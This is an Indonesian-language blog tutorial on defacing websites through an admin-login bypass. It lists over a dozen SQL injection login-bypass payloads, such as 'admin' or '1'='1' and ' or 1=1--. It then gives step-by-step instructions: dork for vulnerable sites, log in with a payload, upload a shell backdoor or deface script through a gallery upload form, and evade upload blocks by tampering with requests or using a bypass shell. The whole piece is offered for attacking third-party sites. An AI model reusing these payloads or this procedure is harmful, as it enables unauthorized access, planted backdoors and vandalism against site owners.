Cara deface website Bypass admin 2022

 


Bypass Admin Login~ Sebenarnya ini tidak jauh berbeda dan masih berhubungan dengan SQL Injection. Jika kita ketahui, bug ini memungkinkan seorang attacker untuk masuk sebagai admin hanya dengan memasukan username dan password contoh seperti or 1=1 tanpa harus repot-repot seperti halnya melakukan ekploitasi website


Payload Bypass Admin

Dari sekian banyak query yang bertebaran di internet, disini saya akan membagikan beberapa query yang sering saya gunakan untuk bypass admin login website, diantaranya sebagai berikut:


admin' #

admin' or '1'='1

admin' or '1'='1'#

admin' or 1=1 or ''='

'or 1=1 limit 1 -- -+

' or '1'='1

' or 'x'='x

' or 0=0 --

' or 0=0 #

' or 1=1--

' or 'one'='one

'or 1=1-- -

'or''='

' or "a"="a" #


Dork Bypas admin

Untuk Dork Bypas admin klik Disini 


Bahan Eksekusi

- Shell backdoor ,jika tidak punya Shell backdoor bisa download di sini 

- Script deface 


Tutorial :

Pertama2 kalian dorking terlebih dahulu dari dork diatas / dork lain juga bisa lalu pilih salah satu web dan masukan username dan password seperti berikut :

username : '=''or'

password : '=''or'

Untuk user dan password bisa menggunakan paylod lainya.


Jika vuln maka akan langsung masuk ke dashboard / halaman admin.



Jika kalian ingin mengupload shell backdoor/script deface, kali bisa upload di bagian gallery / bagian untuk upload file lainnya.


Disini saya terkena forbidden saat upload shell



Disini kalian bisa menggunakan cara Tamper data / menggunakan bypas Shell ,jika tidak punya Shell bypas bisa download disini


Untuk cara tamper data Via android klik Disini



LihatTutupKomentar